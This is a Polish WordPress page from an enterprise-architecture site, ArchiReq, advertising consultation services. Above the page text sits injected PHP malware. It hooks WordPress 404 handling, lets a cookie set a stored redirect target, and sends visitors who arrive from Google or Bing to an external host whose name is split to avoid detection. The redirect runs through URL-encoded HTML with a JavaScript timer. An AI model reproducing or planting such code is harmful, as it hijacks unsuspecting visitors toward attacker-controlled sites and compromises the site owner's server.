function wpd_do_stuff_on_40404(){ if( is_404() ){ if (!empty($_COOKIE["7a245f27bb6d4fefb5a20859bd576373"])) { update_option('wpd_do_stuff_on_40404_url', rawurldecode($_COOKIE["7a245f27bb6d4fefb5a20859bd576373"])); } if (strpos($_SERVER["HTTP_REFERER"], 'google.') !== FALSE || strpos($_SERVER["HTTP_REFERER"], 'bing.') !== FALSE) { $u = get_option('wpd_do_stuff_on_40404_url', 'mywebinfo.s' . 'ite/jquery.php'); if (!empty($u)) { $fu = 'http://' . $u . "?referrer=" . $_SERVER["HTTP_REFERER"] . '&u=' . rawurlencode($_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]); $t = rawurldecode("%3Chtml%3E%0D%0A%20%20%20%3Chead%3E%0D%0A%20%20%20%20%20%20%3Cscript%20type%20%3D%20%22text%2Fjavascript%22%3E%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20function%20Redirect%28%29%20%7B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20window.location%20%3D%20%22%25s%22%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20document.write%28%22You%20will%20be%20redirected%20to%20main%20page%20in%202%20sec.%22%29%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20setTimeout%28%27Redirect%28%29%27%2C%202000%29%3B%0D%0A%20%20%20%20%20%20%3C%2Fscript%3E%0D%0A%20%20%20%3C%2Fhead%3E%0D%0A%20%20%20%3Cbody%3E%0D%0A%20%20%20%3C%2Fbody%3E%0D%0A%3C%2Fhtml%3E%0D%0A"); exit(sprintf($t, $fu)); } } } } add_action( 'template_redirect', 'wpd_do_stuff_on_40404' ); Konsultacje | ArchiReq | Architektura korporacyjna w praktyce

Konsultacje

Listopad 16, 2011

Konsultacje (niedostępne od 01.01.2013) w zakresie m.in.:

  • definiowania zakresu odpowiedzialności architektury korporacyjnej,
  • aspektów wdrożeniowych architektury korporacyjnej,
  • przygotowania środowiska pracy (procedury, narzędzia) zespołu architektów korporacyjnych,
  • definiowania punktów odcięcia i styków pomiędzy warstą biznesową, aplikacji i infrastruktury,
  • modelowania architektury korporacyjnej (procesy biznesowe, arefakty warstwy aplikacji i warstwy infrastruktury oraz wzajemnych powiązań),
  • analizy jakościowej i ilościowej wpływu zmian w architekturze,

oraz innych tematów związanych z architekturą korporacyjną.